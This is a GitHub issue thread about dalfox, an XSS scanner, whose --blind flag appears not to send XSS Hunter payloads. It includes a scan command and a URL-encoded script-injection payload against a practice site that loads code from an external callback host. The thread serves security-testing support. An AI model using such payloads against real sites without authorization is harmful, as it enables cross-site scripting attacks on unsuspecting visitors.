### ISSUE TITLE
--blind flag not working

### ISSUE THREAD

**Issue by tarunkant** [hahwul/dalfox#214]
## Describe the bug
It seems that `--blind` flag not working

## Environment
 * Dalfox Version: `v2.3.6`
 * Installed from: (`GO111MODULE=on go get -v github.com/hahwul/dalfox/v2`)

Run this command 
```bash
dalfox url "https://xss-game.appspot.com/level1/frame?query=a" --blind https://YOURSUBDOMAIN.xss.ht
```

Now checkout, your xsshunter profile, you wouldn't get any ping.

Thanks,

**Comment by hahwul** [comment]
Hi @tarunkant 
This option is for passing an XSSHunter based blind xss payload. The callback occurs when the victim accesses the blind-xss code, and which is a function of xss hunter.

Is it an issue where xss hunter payload is incorrectly transmitted or not transmitted?

![스크린샷, 2021-03-31 21-33-45](https://user-images.githubusercontent.com/13212227/113144998-dc95f000-9268-11eb-9e86-f0a81a700868.png)
(I tested it but request with xss hunter payloads)

and open this payload
```
https://xss-game.appspot.com/level1/frame?query=a%22%27%3E%3Cscript+src%3Dhttps%3A%2F%2Fhahwul.xss.ht%3E%3C%2Fscript%3E
```

callback from xsshunter
![444](https://user-images.githubusercontent.com/13212227/113145280-37c7e280-9269-11eb-928e-dacea221cb37.png)

**Comment by tarunkant** [comment]
Hello @hahwul,

The XSS hunter payload is not transmitted.

Here is my output of `dalfox url "https://xss-game.appspot.com/level1/frame?query=a" --blind https://YOURSUBDOMAIN.xss.ht`

![image](https://user-images.githubusercontent.com/20815966/113150752-068fe800-9252-11eb-8534-08ec30fbe07c.png)

As you can see the XSS hunter payload is not there in the output.

**Comment by hahwul** [comment]
Hello again @tarunkant 
dalfox does not print except for the first verified xss payload. Because dalfox sends 100 ~ 10,000 +@ requests, and sometimes there can be a huge amount of duplicate detections. 

Blind XSS does not need to be exposed to an attacker by default, because typically a sent query is inserted into another system and triggered if there is a victim reading that page.

To see if an actual request is sent, you can check the data that is sent through the `--proxy` option, etc. As you can see, if you have the blind option, the blind xss code is included and sent.
